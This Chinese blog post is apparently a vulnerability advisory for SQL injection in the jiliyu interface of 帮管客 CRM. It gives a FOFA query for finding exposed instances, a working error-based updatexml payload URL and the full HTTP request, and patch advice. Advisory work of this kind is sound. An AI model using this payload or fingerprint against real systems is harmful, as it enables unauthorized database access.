帮管客CRM(jiliyu)接口SQL注入漏洞

  • 开发
  • 13

文章目录

前言

帮管客CRM客户管理系统专注于为企业提供crm客户关系管理、crm管理系统、crm软件产品及企业销售管理流程解决方案服务,助力企业业绩增长。

声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

帮管客CRM客户管理系统专注于为企业提供crm客户关系管理、crm管理系统、crm软件产品及企业销售管理流程解决方案服务,助力企业业绩增长。帮管客CRM jiliyu接口存在SQL注入漏洞

二、影响版本

帮管客CRM
在这里插入图片描述

三、漏洞复现

FOFA:app="帮管客-CRM"

漏洞链接:http://127.0.0.1/index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7f,(select%20md5(1)),0x7f),1))

漏洞数据包:

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7f,(select%20md5(1)),0x7f),1)) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

在这里插入图片描述

四、修复建议

下载更新补丁程序:https://www.bgk100.com/

阅读全部

相关推荐

  5. 【1day】DocCms 某接口SQL注入漏洞学习

    2024-03-13 07:00:01       39 阅读

  9. SQL注入漏洞利用

    2024-03-13 07:00:01       32 阅读

最近更新

  4. TCP协议是安全的吗?

    2024-03-13 07:00:01       18 阅读

  12. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-13 07:00:01       19 阅读

  13. 【Python教程】压缩PDF文件大小

    2024-03-13 07:00:01       18 阅读

  18. 通过文章id递归查询所有评论(xml)

    2024-03-13 07:00:01       20 阅读

热门阅读

  4. 使用cuBLAS做行优先矩阵的矩阵乘

    2024-03-13 07:00:01       18 阅读

  8. Vue-Router实现带参数跳转,并且保存原页面数据记录

    2024-03-13 07:00:01       22 阅读

  10. go语言tcp协议实现文件上传

    2024-03-13 07:00:01       24 阅读

  12. 指针数组与数组指针

    2024-03-13 07:00:01       21 阅读

  17. 使用go开发的小tips

    2024-03-13 07:00:01       20 阅读

  20. 如何使用 CSS 中的 :root 伪类选择器

    2024-03-13 07:00:01       25 阅读

  22. SpringCloud-实现基于RabbitMQ的消息队列

    2024-03-13 07:00:01       23 阅读

  26. Linux纯命令行查看文本文件

    2024-03-13 07:00:01       23 阅读